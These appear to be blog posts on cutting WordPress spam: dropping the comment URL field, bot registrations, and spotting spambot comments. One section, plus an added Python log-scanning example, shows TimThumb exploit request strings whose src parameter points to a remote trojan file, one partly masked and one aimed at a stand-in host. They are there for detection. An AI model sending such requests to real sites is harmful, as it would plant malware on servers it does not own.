Removing Website URL from Comment Forms Stops Spammers
Another way to stop spam comments – get rid of the website URL field in comment forms. We’ve finally got rid of nearly all spam comments on graphicline.co.za. Although the site was already protected by Project Honeypot, and comments use a CAPTCHA challenge, we were still getting a lot of spam. Instead of switching to reCAPTCHA with its more difficult text, we looked for another way to reduce successful spam comments.
The common factor to all spam comments was the inclusion of a homepage URL in the form field. The thinking was: if there’s no field for the URL, then spambots may fail, as they can’t finish their job. Without a homepage URL field, manual spammers may be discouraged from posting rubbish as well.
Taking Spam Control to an Extreme Level
We took spam control to a ridiculous level, as an exercise in discovering just how effectively spam can be blocked with WordPress, and it has been an interesting one. We looked at the 4 main types of spam one is likely to see on a blog: comment spam, trackback spam, spam registrations and, finally, e-mail spam from contact forms.
The site chosen was our WordPress information site. A few months back a plugin support forum was added to the site, and public registrations were allowed. Almost immediately there was a spate of spam registrations – “visitors” registering an account. Most were bots. How do we know? Well, the only link to the registration form is from forum pages, and only a few registration attempts came from one of these referrer pages – the others all arrived at the form directly, without visiting the site at all.
Hackers Using Picasa Spoof for Web Malware
Strange-looking referer URLs and GET requests that appear to come from Picasa are being used by hackers to find website vulnerabilities and inject malware or spam. Examining the details of the referer reveals something like this example: /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in the string for your safety – it leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or something similar) should be regarded as extremely suspicious; the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen alongside WordPress TimThumb exploit attempts.
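As an added example, not from the original post, here is a small Python check over constructed access-log lines that flags thumb.php fetches, and referers, whose hostname embeds a trusted brand name (picasa, google) without actually belonging to the trusted domain. The allowlist, brand labels, log lines and IPs are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); hosts and IPs are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2011:06:12:01 +0200] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.attacker-example.com.ar/2.php HTTP/1.1" 200 512 "http://picasa.com.attacker-example.com.ar/2.php" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2011:06:12:09 +0200] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.google.com/photo.jpg&w=100 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2011:06:13:44 +0200] "GET /2011/10/some-post/ HTTP/1.1" 200 9876 "http://www.google.com/search?q=wordpress" "Mozilla/5.0"
"""

# Assumed allowlist: registrable domains the theme's thumb.php is meant to fetch from, and the
# brand labels whose appearance in any *other* hostname marks a look-alike (picasa.com.<something>).
TRUSTED_DOMAINS = {"google.com", "youtube.com"}
BRAND_LABELS = {"picasa", "google", "youtube"}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \S+ \S+ "(?P<referer>[^"]*)"')


def classify_host(host):
    """'trusted' for a host under an allowlisted domain, 'lookalike' if a brand label is
    embedded in a host outside those domains, otherwise 'untrusted'."""
    host = host.lower().rstrip(".")
    if any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS):
        return "trusted"
    if BRAND_LABELS & set(host.split(".")):
        return "lookalike"
    return "untrusted"


def scan_log(log_text):
    """Return (ip, where, host, verdict) for every thumb.php src= fetch and every look-alike referer."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path.lower().endswith(("thumb.php", "timthumb.php")):
            for src in parse_qs(target.query).get("src", []):
                host = urlsplit(src).hostname or ""
                findings.append((m.group("ip"), "src", host, classify_host(host)))
        ref_host = urlsplit(m.group("referer")).hostname or ""
        if ref_host and classify_host(ref_host) == "lookalike":
            findings.append((m.group("ip"), "referer", ref_host, "lookalike"))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Only the first line's IP shows a look-alike in both the src parameter and the referer; the genuine picasa.google.com fetch and the www.google.com referer are left alone.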
Spambot – Check the Names and Websites
Spambots getting better? This spammer’s automated spam-bot message is almost convincing. I had to stop for a moment and think; I had almost started moving the mouse to find the list of e-mail subscribers when I remembered something – the posted name and website link was not one of the available sign-in services (WordPress, Facebook, Twitter), so how did this commenter manage to subscribe by e-mail when leaving a comment? SPAMBOT…
It nearly got published. It is still a bit early for me; I don’t function too well until I have seriously diluted the blood level in my caffeine stream, and even the eyes don’t see too well until the caffeine overtakes the red cell concentration, so I almost missed the “great site dod” intro and the spam terms “cheap” and “viagra”.
Spammers are Losers
It has been a while since I mentioned spam commenters… This blog gets very little these days since restricting commenting to logged-in visitors only. A vast improvement from the days of finding 50 or more spam-bot or manually generated nonsense comments in the spam folder.
However, some of the blogs I manage for others get these spam comments. The ones I mention are still small, written by occasional bloggers, and I just take care of formatting, graphics, proofreading and admin tasks on behalf of the authors.
Last week I was doing the rounds of these blogs, checking the comments, and found a number of comments which were complimentary, short remarks even relevant to the topic of the posts concerned, but with outgoing links all over the place. I decided to have a bit of fun with the spammers, and approved their comments – after editing!
The net result – the spammers are all-round losers.
Editing the Spam Comments
First off, the links had to go… The rule is simple: links from spammers are bad news, even if “nofollowed” – who knows what dangerous malware is on the linked-to page. I really do not want visitors to these blogs to click the link (or even copy and paste it into their browser) and end up getting their computers infected with a trojan or virus. So the links were deleted entirely.